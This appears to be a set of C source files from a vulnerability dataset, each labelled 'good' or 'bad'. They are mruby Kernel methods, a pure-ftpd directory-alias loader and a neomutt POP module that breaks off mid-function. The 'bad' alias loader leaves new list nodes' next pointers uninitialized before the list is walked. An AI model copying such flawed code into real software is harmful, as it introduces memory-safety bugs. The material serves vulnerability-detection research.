b = mrb_basic_ptr(self);
if (!MRB_FROZEN_P(b)) {
MRB_SET_FROZEN_FLAG(b);
}
return self;
}
static mrb_value
mrb_obj_frozen(mrb_state *mrb, mrb_value self)
{
struct RBasic *b;
switch (mrb_type(self)) {
case MRB_TT_FALSE:
case MRB_TT_TRUE:
case MRB_TT_FIXNUM:
case MRB_TT_SYMBOL:
#ifndef MRB_WITHOUT_FLOAT
case MRB_TT_FLOAT:
#endif
return mrb_true_value();
default:
break;
}
b = mrb_basic_ptr(self);
if (!MRB_FROZEN_P(b)) {
return mrb_false_value();
}
return mrb_true_value();
}
/* 15.3.1.3.15 */
/*
* call-seq:
* obj.hash -> fixnum
*
* Generates a <code>Fixnum</code> hash value for this object. This
* function must have the property that <code>a.eql?(b)</code> implies
* <code>a.hash == b.hash</code>. The hash value is used by class
* <code>Hash</code>. Any hash value that exceeds the capacity of a
* <code>Fixnum</code> will be truncated before being used.
*/
MRB_API mrb_value
mrb_obj_hash(mrb_state *mrb, mrb_value self)
{
return mrb_fixnum_value(mrb_obj_id(self));
}
/* 15.3.1.3.16 */
static mrb_value
mrb_obj_init_copy(mrb_state *mrb, mrb_value self)
{
mrb_value orig;
mrb_get_args(mrb, "o", &orig);
if (mrb_obj_equal(mrb, self, orig)) return self;
if ((mrb_type(self) != mrb_type(orig)) || (mrb_obj_class(mrb, self) != mrb_obj_class(mrb, orig))) {
mrb_raise(mrb, E_TYPE_ERROR, "initialize_copy should take same class object");
}
return self;
}
MRB_API mrb_bool
mrb_obj_is_instance_of(mrb_state *mrb, mrb_value obj, struct RClass* c)
{
if (mrb_obj_class(mrb, obj) == c) return TRUE;
return FALSE;
}
/* 15.3.1.3.19 */
/*
* call-seq:
* obj.instance_of?(class) -> true or false
*
* Returns <code>true</code> if <i>obj</i> is an instance of the given
* class. See also <code>Object#kind_of?</code>.
*/
static mrb_value
obj_is_instance_of(mrb_state *mrb, mrb_value self)
{
mrb_value arg;
mrb_get_args(mrb, "C", &arg);
return mrb_bool_value(mrb_obj_is_instance_of(mrb, self, mrb_class_ptr(arg)));
}
/* 15.3.1.3.20 */
/*
* call-seq:
* obj.instance_variable_defined?(symbol) -> true or false
*
* Returns <code>true</code> if the given instance variable is
* defined in <i>obj</i>.
*
* class Fred
* def initialize(p1, p2)
* @a, @b = p1, p2
* end
* end
* fred = Fred.new('cat', 99)
* fred.instance_variable_defined?(:@a) #=> true
* fred.instance_variable_defined?("@b") #=> true
* fred.instance_variable_defined?("@c") #=> false
*/
static mrb_value
mrb_obj_ivar_defined(mrb_state *mrb, mrb_value self)
{
mrb_sym sym;
mrb_get_args(mrb, "n", &sym);
mrb_iv_check(mrb, sym);
return mrb_bool_value(mrb_iv_defined(mrb, self, sym));
}
/* 15.3.1.3.21 */
/*
* call-seq:
* obj.instance_variable_get(symbol) -> obj
*
* Returns the value of the given instance variable, or nil if the
* instance variable is not set. The <code>@</code> part of the
* variable name should be included for regular instance
* variables. Throws a <code>NameError</code> exception if the
* supplied symbol is not valid as an instance variable name.
*
* class Fred
* def initialize(p1, p2)
* @a, @b = p1, p2
* end
* end
* fred = Fred.new('cat', 99)
* fred.instance_variable_get(:@a) #=> "cat"
* fred.instance_variable_get("@b") #=> 99
*/
static mrb_value
mrb_obj_ivar_get(mrb_state *mrb, mrb_value self)
{
mrb_sym iv_name;
mrb_get_args(mrb, "n", &iv_name);
mrb_iv_check(mrb, iv_name);
return mrb_iv_get(mrb, self, iv_name);
}
/* 15.3.1.3.22 */
/*
* call-seq:
* obj.instance_variable_set(symbol, obj) -> obj
*
* Sets the instance variable names by <i>symbol</i> to
* <i>object</i>, thereby frustrating the efforts of the class's
* author to attempt to provide proper encapsulation. The variable
* did not have to exist prior to this call.
*
* class Fred
* def initialize(p1, p2)
* @a, @b = p1, p2
* end
* end
* fred = Fred.new('cat', 99)
* fred.instance_variable_set(:@a, 'dog') #=> "dog"
* fred.instance_variable_set(:@c, 'cat') #=> "cat"
* fred.inspect #=> "#<Fred:0x401b3da8 @a=\"dog\", @b=99, @c=\"cat\">"
*/
static mrb_value
mrb_obj_ivar_set(mrb_state *mrb, mrb_value self)
{
mrb_sym iv_name;
mrb_value val;
mrb_get_args(mrb, "no", &iv_name, &val);
mrb_iv_check(mrb, iv_name);
mrb_iv_set(mrb, self, iv_name, val);
return val;
}
/* 15.3.1.3.24 */
/* 15.3.1.3.26 */
/*
* call-seq:
* obj.is_a?(class) -> true or false
* obj.kind_of?(class) -> true or false
*
* Returns <code>true</code> if <i>class</i> is the class of
* <i>obj</i>, or if <i>class</i> is one of the superclasses of
* <i>obj</i> or modules included in <i>obj</i>.
*
* module M; end
* class A
* include M
* end
* class B < A; end
* class C < B; end
* b = B.new
* b.instance_of? A #=> false
* b.instance_of? B #=> true
* b.instance_of? C #=> false
* b.instance_of? M #=> false
* b.kind_of? A #=> true
* b.kind_of? B #=> true
* b.kind_of? C #=> false
* b.kind_of? M #=> true
*/
static mrb_value
mrb_obj_is_kind_of_m(mrb_state *mrb, mrb_value self)
{
mrb_value arg;
mrb_get_args(mrb, "C", &arg);
return mrb_bool_value(mrb_obj_is_kind_of(mrb, self, mrb_class_ptr(arg)));
}
KHASH_DECLARE(st, mrb_sym, char, FALSE)
KHASH_DEFINE(st, mrb_sym, char, FALSE, kh_int_hash_func, kh_int_hash_equal)
static void
method_entry_loop(mrb_state *mrb, struct RClass* klass, khash_t(st)* set)
{
khint_t i;
khash_t(mt) *h = klass->mt;
if (!h || kh_size(h) == 0) return;
for (i=0;i<kh_end(h);i++) {
if (kh_exist(h, i)) {
mrb_method_t m = kh_value(h, i);
if (MRB_METHOD_UNDEF_P(m)) continue;
kh_put(st, mrb, set, kh_key(h, i));
}
}
}
mrb_value
mrb_class_instance_method_list(mrb_state *mrb, mrb_bool recur, struct RClass* klass, int obj)
{
khint_t i;
mrb_value ary;
mrb_bool prepended = FALSE;
struct RClass* oldklass;
khash_t(st)* set = kh_init(st, mrb);
if (!recur && (klass->flags & MRB_FLAG_IS_PREPENDED)) {
MRB_CLASS_ORIGIN(klass);
prepended = TRUE;
}
oldklass = 0;
while (klass && (klass != oldklass)) {
method_entry_loop(mrb, klass, set);
if ((klass->tt == MRB_TT_ICLASS && !prepended) ||
(klass->tt == MRB_TT_SCLASS)) {
}
else {
if (!recur) break;
}
oldklass = klass;
klass = klass->super;
}
ary = mrb_ary_new_capa(mrb, kh_size(set));
for (i=0;i<kh_end(set);i++) {
if (kh_exist(set, i)) {
mrb_ary_push(mrb, ary, mrb_symbol_value(kh_key(set, i)));
}
}
kh_destroy(st, mrb, set);
return ary;
}
static mrb_value
mrb_obj_singleton_methods(mrb_state *mrb, mrb_bool recur, mrb_value obj)
{
khint_t i;
mrb_value ary;
struct RClass* klass;
khash_t(st)* set = kh_init(st, mrb);
klass = mrb_class(mrb, obj);
if (klass && (klass->tt == MRB_TT_SCLASS)) {
method_entry_loop(mrb, klass, set);
klass = klass->super;
}
if (recur) {
while (klass && ((klass->tt == MRB_TT_SCLASS) || (klass->tt == MRB_TT_ICLASS))) {
method_entry_loop(mrb, klass, set);
klass = klass->super;
}
}
ary = mrb_ary_new(mrb);
for (i=0;i<kh_end(set);i++) {
if (kh_exist(set, i)) {
mrb_ary_push(mrb, ary, mrb_symbol_value(kh_key(set, i)));
}
}
kh_destroy(st, mrb, set);
return ary;
}
static mrb_value
mrb_obj_methods(mrb_state *mrb, mrb_bool recur, mrb_value obj, mrb_method_flag_t flag)
{
return mrb_class_instance_method_list(mrb, recur, mrb_class(mrb, obj), 0);
}
/* 15.3.1.3.31 */
/*
* call-seq:
* obj.methods -> array
*
* Returns a list of the names of methods publicly accessible in
* <i>obj</i>. This will include all the methods accessible in
* <i>obj</i>'s ancestors.
*
* class Klass
* def kMethod()
* end
* end
* k = Klass.new
* k.methods[0..9] #=> [:kMethod, :respond_to?, :nil?, :is_a?,
* # :class, :instance_variable_set,
* # :methods, :extend, :__send__, :instance_eval]
* k.methods.length #=> 42
*/
static mrb_value
mrb_obj_methods_m(mrb_state *mrb, mrb_value self)
{
mrb_bool recur = TRUE;
mrb_get_args(mrb, "|b", &recur);
return mrb_obj_methods(mrb, recur, self, (mrb_method_flag_t)0); /* everything but private */
}
/* 15.3.1.3.32 */
/*
* call_seq:
* nil.nil? -> true
* <anything_else>.nil? -> false
*
* Only the object <i>nil</i> responds <code>true</code> to <code>nil?</code>.
*/
static mrb_value
mrb_false(mrb_state *mrb, mrb_value self)
{
return mrb_false_value();
}
/* 15.3.1.3.36 */
/*
* call-seq:
* obj.private_methods(all=true) -> array
*
* Returns the list of private methods accessible to <i>obj</i>. If
* the <i>all</i> parameter is set to <code>false</code>, only those methods
* in the receiver will be listed.
*/
static mrb_value
mrb_obj_private_methods(mrb_state *mrb, mrb_value self)
{
mrb_bool recur = TRUE;
mrb_get_args(mrb, "|b", &recur);
return mrb_obj_methods(mrb, recur, self, NOEX_PRIVATE); /* private attribute not define */
}
/* 15.3.1.3.37 */
/*
* call-seq:
* obj.protected_methods(all=true) -> array
*
* Returns the list of protected methods accessible to <i>obj</i>. If
* the <i>all</i> parameter is set to <code>false</code>, only those methods
* in the receiver will be listed.
*/
static mrb_value
mrb_obj_protected_methods(mrb_state *mrb, mrb_value self)
{
mrb_bool recur = TRUE;
mrb_get_args(mrb, "|b", &recur);
return mrb_obj_methods(mrb, recur, self, NOEX_PROTECTED); /* protected attribute not define */
}
/* 15.3.1.3.38 */
/*
* call-seq:
* obj.public_methods(all=true) -> array
*
* Returns the list of public methods accessible to <i>obj</i>. If
* the <i>all</i> parameter is set to <code>false</code>, only those methods
* in the receiver will be listed.
*/
static mrb_value
mrb_obj_public_methods(mrb_state *mrb, mrb_value self)
{
mrb_bool recur = TRUE;
mrb_get_args(mrb, "|b", &recur);
return mrb_obj_methods(mrb, recur, self, NOEX_PUBLIC); /* public attribute not define */
}
/* 15.3.1.2.12 */
/* 15.3.1.3.40 */
/*
* call-seq:
* raise
* raise(string)
* raise(exception [, string])
*
* With no arguments, raises a <code>RuntimeError</code>
* With a single +String+ argument, raises a
* +RuntimeError+ with the string as a message. Otherwise,
* the first parameter should be the name of an +Exception+
* class (or an object that returns an +Exception+ object when sent
* an +exception+ message). The optional second parameter sets the
* message associated with the exception, and the third parameter is an
* array of callback information. Exceptions are caught by the
* +rescue+ clause of <code>begin...end</code> blocks.
*
* raise "Failed to create socket"
* raise ArgumentError, "No parameters", caller
*/
MRB_API mrb_value
mrb_f_raise(mrb_state *mrb, mrb_value self)
{
mrb_value a[2], exc;
mrb_int argc;
argc = mrb_get_args(mrb, "|oo", &a[0], &a[1]);
switch (argc) {
case 0:
mrb_raise(mrb, E_RUNTIME_ERROR, "");
break;
case 1:
if (mrb_string_p(a[0])) {
a[1] = a[0];
argc = 2;
a[0] = mrb_obj_value(E_RUNTIME_ERROR);
}
/* fall through */
default:
exc = mrb_make_exception(mrb, argc, a);
mrb_exc_raise(mrb, exc);
break;
}
return mrb_nil_value(); /* not reached */
}
static mrb_value
mrb_krn_class_defined(mrb_state *mrb, mrb_value self)
{
mrb_value str;
mrb_get_args(mrb, "S", &str);
return mrb_bool_value(mrb_class_defined(mrb, RSTRING_PTR(str)));
}
/* 15.3.1.3.41 */
/*
* call-seq:
* obj.remove_instance_variable(symbol) -> obj
*
* Removes the named instance variable from <i>obj</i>, returning that
* variable's value.
*
* class Dummy
* attr_reader :var
* def initialize
* @var = 99
* end
* def remove
* remove_instance_variable(:@var)
* end
* end
* d = Dummy.new
* d.var #=> 99
* d.remove #=> 99
* d.var #=> nil
*/
static mrb_value
mrb_obj_remove_instance_variable(mrb_state *mrb, mrb_value self)
{
mrb_sym sym;
mrb_value val;
mrb_get_args(mrb, "n", &sym);
mrb_iv_check(mrb, sym);
val = mrb_iv_remove(mrb, self, sym);
if (mrb_undef_p(val)) {
mrb_name_error(mrb, sym, "instance variable %S not defined", mrb_sym2str(mrb, sym));
}
return val;
}
void
mrb_method_missing(mrb_state *mrb, mrb_sym name, mrb_value self, mrb_value args)
{
mrb_no_method_error(mrb, name, args, "undefined method '%S'", mrb_sym2str(mrb, name));
}
/* 15.3.1.3.30 */
/*
* call-seq:
* obj.method_missing(symbol [, *args] ) -> result
*
* Invoked by Ruby when <i>obj</i> is sent a message it cannot handle.
* <i>symbol</i> is the symbol for the method called, and <i>args</i>
* are any arguments that were passed to it. By default, the interpreter
* raises an error when this method is called. However, it is possible
* to override the method to provide more dynamic behavior.
* If it is decided that a particular method should not be handled, then
* <i>super</i> should be called, so that ancestors can pick up the
* missing method.
* The example below creates
* a class <code>Roman</code>, which responds to methods with names
* consisting of roman numerals, returning the corresponding integer
* values.
*
* class Roman
* def romanToInt(str)
* # ...
* end
* def method_missing(methId)
* str = methId.id2name
* romanToInt(str)
* end
* end
*
* r = Roman.new
* r.iv #=> 4
* r.xxiii #=> 23
* r.mm #=> 2000
*/
#ifdef MRB_DEFAULT_METHOD_MISSING
static mrb_value
mrb_obj_missing(mrb_state *mrb, mrb_value mod)
{
mrb_sym name;
mrb_value *a;
mrb_int alen;
mrb_get_args(mrb, "n*!", &name, &a, &alen);
mrb_method_missing(mrb, name, mod, mrb_ary_new_from_values(mrb, alen, a));
/* not reached */
return mrb_nil_value();
}
#endif
static inline mrb_bool
basic_obj_respond_to(mrb_state *mrb, mrb_value obj, mrb_sym id, int pub)
{
return mrb_respond_to(mrb, obj, id);
}
/* 15.3.1.3.43 */
/*
* call-seq:
* obj.respond_to?(symbol, include_private=false) -> true or false
*
* Returns +true+ if _obj_ responds to the given
* method. Private methods are included in the search only if the
* optional second parameter evaluates to +true+.
*
* If the method is not implemented,
* as Process.fork on Windows, File.lchmod on GNU/Linux, etc.,
* false is returned.
*
* If the method is not defined, <code>respond_to_missing?</code>
* method is called and the result is returned.
*/
static mrb_value
obj_respond_to(mrb_state *mrb, mrb_value self)
{
mrb_value mid;
mrb_sym id, rtm_id;
mrb_bool priv = FALSE, respond_to_p = TRUE;
mrb_get_args(mrb, "o|b", &mid, &priv);
if (mrb_symbol_p(mid)) {
id = mrb_symbol(mid);
}
else {
mrb_value tmp;
if (mrb_string_p(mid)) {
tmp = mrb_check_intern_str(mrb, mid);
}
else {
tmp = mrb_check_string_type(mrb, mid);
if (mrb_nil_p(tmp)) {
tmp = mrb_inspect(mrb, mid);
mrb_raisef(mrb, E_TYPE_ERROR, "%S is not a symbol", tmp);
}
tmp = mrb_check_intern_str(mrb, tmp);
}
if (mrb_nil_p(tmp)) {
respond_to_p = FALSE;
}
else {
id = mrb_symbol(tmp);
}
}
if (respond_to_p) {
respond_to_p = basic_obj_respond_to(mrb, self, id, !priv);
}
if (!respond_to_p) {
rtm_id = mrb_intern_lit(mrb, "respond_to_missing?");
if (basic_obj_respond_to(mrb, self, rtm_id, !priv)) {
mrb_value args[2], v;
args[0] = mid;
args[1] = mrb_bool_value(priv);
v = mrb_funcall_argv(mrb, self, rtm_id, 2, args);
return mrb_bool_value(mrb_bool(v));
}
}
return mrb_bool_value(respond_to_p);
}
/* 15.3.1.3.45 */
/*
* call-seq:
* obj.singleton_methods(all=true) -> array
*
* Returns an array of the names of singleton methods for <i>obj</i>.
* If the optional <i>all</i> parameter is true, the list will include
* methods in modules included in <i>obj</i>.
* Only public and protected singleton methods are returned.
*
* module Other
* def three() end
* end
*
* class Single
* def Single.four() end
* end
*
* a = Single.new
*
* def a.one()
* end
*
* class << a
* include Other
* def two()
* end
* end
*
* Single.singleton_methods #=> [:four]
* a.singleton_methods(false) #=> [:two, :one]
* a.singleton_methods #=> [:two, :one, :three]
*/
static mrb_value
mrb_obj_singleton_methods_m(mrb_state *mrb, mrb_value self)
{
mrb_bool recur = TRUE;
mrb_get_args(mrb, "|b", &recur);
return mrb_obj_singleton_methods(mrb, recur, self);
}
static mrb_value
mod_define_singleton_method(mrb_state *mrb, mrb_value self)
{
struct RProc *p;
mrb_method_t m;
mrb_sym mid;
mrb_value blk = mrb_nil_value();
mrb_get_args(mrb, "n&", &mid, &blk);
if (mrb_nil_p(blk)) {
mrb_raise(mrb, E_ARGUMENT_ERROR, "no block given");
}
p = (struct RProc*)mrb_obj_alloc(mrb, MRB_TT_PROC, mrb->proc_class);
mrb_proc_copy(p, mrb_proc_ptr(blk));
p->flags |= MRB_PROC_STRICT;
MRB_METHOD_FROM_PROC(m, p);
mrb_define_method_raw(mrb, mrb_class_ptr(mrb_singleton_class(mrb, self)), mid, m);
return mrb_symbol_value(mid);
}
static mrb_value
mrb_obj_ceqq(mrb_state *mrb, mrb_value self)
{
mrb_value v;
mrb_int i, len;
mrb_sym eqq = mrb_intern_lit(mrb, "===");
mrb_value ary = mrb_ary_splat(mrb, self);
mrb_get_args(mrb, "o", &v);
len = RARRAY_LEN(ary);
for (i=0; i<len; i++) {
mrb_value c = mrb_funcall_argv(mrb, mrb_ary_entry(ary, i), eqq, 1, &v);
if (mrb_test(c)) return mrb_true_value();
}
return mrb_false_value();
}
/* 15.3.1.2.7 */
/*
* call-seq:
* local_variables -> array
*
* Returns the names of local variables in the current scope.
*
* [mruby limitation]
* If variable symbol information was stripped out from
* compiled binary files using `mruby-strip -l`, this
* method always returns an empty array.
*/
static mrb_value
mrb_local_variables(mrb_state *mrb, mrb_value self)
{
struct RProc *proc;
mrb_irep *irep;
mrb_value vars;
size_t i;
proc = mrb->c->ci[-1].proc;
if (MRB_PROC_CFUNC_P(proc)) {
return mrb_ary_new(mrb);
}
vars = mrb_hash_new(mrb);
while (proc) {
if (MRB_PROC_CFUNC_P(proc)) break;
irep = proc->body.irep;
if (!irep->lv) break;
for (i = 0; i + 1 < irep->nlocals; ++i) {
if (irep->lv[i].name) {
mrb_hash_set(mrb, vars, mrb_symbol_value(irep->lv[i].name), mrb_true_value());
}
}
if (!MRB_PROC_ENV_P(proc)) break;
proc = proc->upper;
//if (MRB_PROC_SCOPE_P(proc)) break;
if (!proc->c) break;
}
return mrb_hash_keys(mrb, vars);
}
mrb_value mrb_obj_equal_m(mrb_state *mrb, mrb_value);
void
mrb_init_kernel(mrb_state *mrb)
{
struct RClass *krn;
mrb->kernel_module = krn = mrb_define_module(mrb, "Kernel"); /* 15.3.1 */
mrb_define_class_method(mrb, krn, "block_given?", mrb_f_block_given_p_m, MRB_ARGS_NONE()); /* 15.3.1.2.2 */
mrb_define_class_method(mrb, krn, "global_variables", mrb_f_global_variables, MRB_ARGS_NONE()); /* 15.3.1.2.4 */
mrb_define_class_method(mrb, krn, "iterator?", mrb_f_block_given_p_m, MRB_ARGS_NONE()); /* 15.3.1.2.5 */
mrb_define_class_method(mrb, krn, "local_variables", mrb_local_variables, MRB_ARGS_NONE()); /* 15.3.1.2.7 */
; /* 15.3.1.2.11 */
mrb_define_class_method(mrb, krn, "raise", mrb_f_raise, MRB_ARGS_OPT(2)); /* 15.3.1.2.12 */
mrb_define_method(mrb, krn, "singleton_class", mrb_singleton_class, MRB_ARGS_NONE());
mrb_define_method(mrb, krn, "===", mrb_equal_m, MRB_ARGS_REQ(1)); /* 15.3.1.3.2 */
mrb_define_method(mrb, krn, "block_given?", mrb_f_block_given_p_m, MRB_ARGS_NONE()); /* 15.3.1.3.6 */
mrb_define_method(mrb, krn, "class", mrb_obj_class_m, MRB_ARGS_NONE()); /* 15.3.1.3.7 */
mrb_define_method(mrb, krn, "clone", mrb_obj_clone, MRB_ARGS_NONE()); /* 15.3.1.3.8 */
mrb_define_method(mrb, krn, "dup", mrb_obj_dup, MRB_ARGS_NONE()); /* 15.3.1.3.9 */
mrb_define_method(mrb, krn, "eql?", mrb_obj_equal_m, MRB_ARGS_REQ(1)); /* 15.3.1.3.10 */
mrb_define_method(mrb, krn, "equal?", mrb_obj_equal_m, MRB_ARGS_REQ(1)); /* 15.3.1.3.11 */
mrb_define_method(mrb, krn, "extend", mrb_obj_extend_m, MRB_ARGS_ANY()); /* 15.3.1.3.13 */
mrb_define_method(mrb, krn, "freeze", mrb_obj_freeze, MRB_ARGS_NONE());
mrb_define_method(mrb, krn, "frozen?", mrb_obj_frozen, MRB_ARGS_NONE());
mrb_define_method(mrb, krn, "global_variables", mrb_f_global_variables, MRB_ARGS_NONE()); /* 15.3.1.3.14 */
mrb_define_method(mrb, krn, "hash", mrb_obj_hash, MRB_ARGS_NONE()); /* 15.3.1.3.15 */
mrb_define_method(mrb, krn, "initialize_copy", mrb_obj_init_copy, MRB_ARGS_REQ(1)); /* 15.3.1.3.16 */
mrb_define_method(mrb, krn, "inspect", mrb_obj_inspect, MRB_ARGS_NONE()); /* 15.3.1.3.17 */
mrb_define_method(mrb, krn, "instance_of?", obj_is_instance_of, MRB_ARGS_REQ(1)); /* 15.3.1.3.19 */
mrb_define_method(mrb, krn, "instance_variable_defined?", mrb_obj_ivar_defined, MRB_ARGS_REQ(1)); /* 15.3.1.3.20 */
mrb_define_method(mrb, krn, "instance_variable_get", mrb_obj_ivar_get, MRB_ARGS_REQ(1)); /* 15.3.1.3.21 */
mrb_define_method(mrb, krn, "instance_variable_set", mrb_obj_ivar_set, MRB_ARGS_REQ(2)); /* 15.3.1.3.22 */
mrb_define_method(mrb, krn, "instance_variables", mrb_obj_instance_variables, MRB_ARGS_NONE()); /* 15.3.1.3.23 */
mrb_define_method(mrb, krn, "is_a?", mrb_obj_is_kind_of_m, MRB_ARGS_REQ(1)); /* 15.3.1.3.24 */
mrb_define_method(mrb, krn, "iterator?", mrb_f_block_given_p_m, MRB_ARGS_NONE()); /* 15.3.1.3.25 */
mrb_define_method(mrb, krn, "kind_of?", mrb_obj_is_kind_of_m, MRB_ARGS_REQ(1)); /* 15.3.1.3.26 */
mrb_define_method(mrb, krn, "local_variables", mrb_local_variables, MRB_ARGS_NONE()); /* 15.3.1.3.28 */
#ifdef MRB_DEFAULT_METHOD_MISSING
mrb_define_method(mrb, krn, "method_missing", mrb_obj_missing, MRB_ARGS_ANY()); /* 15.3.1.3.30 */
#endif
mrb_define_method(mrb, krn, "methods", mrb_obj_methods_m, MRB_ARGS_OPT(1)); /* 15.3.1.3.31 */
mrb_define_method(mrb, krn, "nil?", mrb_false, MRB_ARGS_NONE()); /* 15.3.1.3.32 */
mrb_define_method(mrb, krn, "object_id", mrb_obj_id_m, MRB_ARGS_NONE()); /* 15.3.1.3.33 */
mrb_define_method(mrb, krn, "private_methods", mrb_obj_private_methods, MRB_ARGS_OPT(1)); /* 15.3.1.3.36 */
mrb_define_method(mrb, krn, "protected_methods", mrb_obj_protected_methods, MRB_ARGS_OPT(1)); /* 15.3.1.3.37 */
mrb_define_method(mrb, krn, "public_methods", mrb_obj_public_methods, MRB_ARGS_OPT(1)); /* 15.3.1.3.38 */
mrb_define_method(mrb, krn, "raise", mrb_f_raise, MRB_ARGS_ANY()); /* 15.3.1.3.40 */
mrb_define_method(mrb, krn, "remove_instance_variable", mrb_obj_remove_instance_variable,MRB_ARGS_REQ(1)); /* 15.3.1.3.41 */
mrb_define_method(mrb, krn, "respond_to?", obj_respond_to, MRB_ARGS_ANY()); /* 15.3.1.3.43 */
mrb_define_method(mrb, krn, "send", mrb_f_send, MRB_ARGS_ANY()); /* 15.3.1.3.44 */
mrb_define_method(mrb, krn, "singleton_methods", mrb_obj_singleton_methods_m, MRB_ARGS_OPT(1)); /* 15.3.1.3.45 */
mrb_define_method(mrb, krn, "define_singleton_method", mod_define_singleton_method, MRB_ARGS_ANY());
mrb_define_method(mrb, krn, "to_s", mrb_any_to_s, MRB_ARGS_NONE()); /* 15.3.1.3.46 */
mrb_define_method(mrb, krn, "__case_eqq", mrb_obj_ceqq, MRB_ARGS_REQ(1)); /* internal */
mrb_define_method(mrb, krn, "class_defined?", mrb_krn_class_defined, MRB_ARGS_REQ(1));
mrb_include_module(mrb, mrb->object_class, mrb->kernel_module);
mrb_alias_method(mrb, mrb->module_class, mrb_intern_lit(mrb, "dup"), mrb_intern_lit(mrb, "clone"));
}
| ./CrossVul/dataset_final_sorted/CWE-824/c/good_168_0 |
crossvul-cpp_data_bad_4684_0 | /*
0) alias file format.
alternating lines of alias and dir
(this enables embedded whitespace in dir and alias without quoting rules)
optional blank lines
optional lines beginning with '#' as comments
(no you can't put a '#' just anywhere)
1) data structure for alias list nodes.
typedef struct DirAlias_ {
char *alias;
char *dir;
struct DirAlias *next;
} DirAlias;
2) init routine
A) open alias file
B) while not EOF do
read line
parse line
dir must begin with "/"
allocate DirAlias and members
if tail is NULL then head and tail (global DirAlias_t pointers)
are set to member
else tail->next is set to member and then tail is set to member
3) lookup routine
A) given potential alias return dir or NULL
(walk list starting with head looking for match)
4) FTP CWD command mods
A) if chdir() fails try alias (use lookup routine)
5) FTP SITE ALIAS command
A) list aliases
*/
#include <config.h>
#ifdef WITH_DIRALIASES
#include "ftpd.h"
#include "messages.h"
#include "diraliases.h"
#ifdef WITH_DMALLOC
# include <dmalloc.h>
#endif
static DirAlias *head, *tail;
static signed char aliases_up;
/* returns: 0 on success, -1 on failure */
int init_aliases(void)
{
FILE *fp;
char alias[MAXALIASLEN + 1U];
char dir[PATH_MAX + 1U];
if ((fp = fopen(ALIASES_FILE, "r")) == NULL) {
return 0;
}
while (fgets(alias, sizeof alias, fp) != NULL) {
if (*alias == '#' || *alias == '\n' || *alias == 0) {
continue;
}
{
char * const z = alias + strlen(alias) - 1U;
if (*z != '\n') {
goto bad;
}
*z = 0;
}
do {
if (fgets(dir, sizeof dir, fp) == NULL || *dir == 0) {
goto bad;
}
{
char * const z = dir + strlen(dir) - 1U;
if (*z == '\n') {
*z = 0;
}
}
} while (*dir == '#' || *dir == 0);
if (head == NULL) {
if ((head = tail = malloc(sizeof *head)) == NULL ||
(tail->alias = strdup(alias)) == NULL ||
(tail->dir = strdup(dir)) == NULL) {
die_mem();
}
tail->next = NULL;
} else {
DirAlias *curr;
if ((curr = malloc(sizeof *curr)) == NULL ||
(curr->alias = strdup(alias)) == NULL ||
(curr->dir = strdup(dir)) == NULL) {
die_mem();
}
tail->next = curr;
tail = curr;
}
}
fclose(fp);
aliases_up++;
return 0;
bad:
fclose(fp);
logfile(LOG_ERR, MSG_ALIASES_BROKEN_FILE " [" ALIASES_FILE "]");
return -1;
}
char *lookup_alias(const char *alias)
{
const DirAlias *curr = head;
if (aliases_up == 0) {
return NULL;
}
while (curr != NULL) {
if (strcmp(curr->alias, alias) == 0) {
return curr->dir;
}
curr = curr->next;
}
return NULL;
}
void print_aliases(void)
{
const DirAlias *curr = head;
if (aliases_up == 0) {
addreply_noformat(502, MSG_CONF_ERR);
return;
}
addreply_noformat(214, MSG_ALIASES_LIST);
while (curr != NULL) {
char line[MAXALIASLEN + PATH_MAX + 3U];
snprintf(line, sizeof line, " %s %s", curr->alias, curr->dir);
addreply_noformat(0, line);
curr = curr->next;
}
addreply_noformat(214, " ");
}
#endif
| ./CrossVul/dataset_final_sorted/CWE-824/c/bad_4684_0 |
crossvul-cpp_data_bad_250_0 | /**
* @file
* POP network mailbox
*
* @authors
* Copyright (C) 2000-2002 Vsevolod Volkov <vvv@mutt.org.ua>
* Copyright (C) 2006-2007,2009 Rocco Rutte <pdmef@gmx.net>
*
* @copyright
* This program is free software: you can redistribute it and/or modify it under
* the terms of the GNU General Public License as published by the Free Software
* Foundation, either version 2 of the License, or (at your option) any later
* version.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
* FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
* details.
*
* You should have received a copy of the GNU General Public License along with
* this program. If not, see <http://www.gnu.org/licenses/>.
*/
/**
* @page pop POP network mailbox
*
* POP network mailbox
*/
#include "config.h"
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include "mutt/mutt.h"
#include "conn/conn.h"
#include "mutt.h"
#include "pop.h"
#include "bcache.h"
#include "body.h"
#include "context.h"
#include "envelope.h"
#include "globals.h"
#include "header.h"
#include "mailbox.h"
#include "mutt_account.h"
#include "mutt_curses.h"
#include "mutt_socket.h"
#include "mx.h"
#include "ncrypt/ncrypt.h"
#include "options.h"
#include "progress.h"
#include "protos.h"
#include "url.h"
#ifdef USE_HCACHE
#include "hcache/hcache.h"
#endif
#ifdef USE_HCACHE
#define HC_FNAME "neomutt" /* filename for hcache as POP lacks paths */
#define HC_FEXT "hcache" /* extension for hcache as POP lacks paths */
#endif
/**
* cache_id - Make a message-cache-compatible id
* @param id POP message id
* @retval ptr Sanitised string
*
* The POP message id may contain '/' and other awkward characters.
*
* @note This function returns a pointer to a static buffer.
*/
static const char *cache_id(const char *id)
{
static char clean[SHORT_STRING];
mutt_str_strfcpy(clean, id, sizeof(clean));
mutt_file_sanitize_filename(clean, true);
return clean;
}
/**
* fetch_message - write line to file
* @param line String to write
* @param file FILE pointer to write to
* @retval 0 Success
* @retval -1 Failure
*/
static int fetch_message(char *line, void *file)
{
FILE *f = (FILE *) file;
fputs(line, f);
if (fputc('\n', f) == EOF)
return -1;
return 0;
}
/**
* pop_read_header - Read header
* @param pop_data POP data
* @param h Email header
* @retval 0 Success
* @retval -1 Connection lost
* @retval -2 Invalid command or execution error
* @retval -3 Error writing to tempfile
*/
static int pop_read_header(struct PopData *pop_data, struct Header *h)
{
int rc, index;
size_t length;
char buf[LONG_STRING];
FILE *f = mutt_file_mkstemp();
if (!f)
{
mutt_perror("mutt_file_mkstemp failed!");
return -3;
}
snprintf(buf, sizeof(buf), "LIST %d\r\n", h->refno);
rc = pop_query(pop_data, buf, sizeof(buf));
if (rc == 0)
{
sscanf(buf, "+OK %d %zu", &index, &length);
snprintf(buf, sizeof(buf), "TOP %d 0\r\n", h->refno);
rc = pop_fetch_data(pop_data, buf, NULL, fetch_message, f);
if (pop_data->cmd_top == 2)
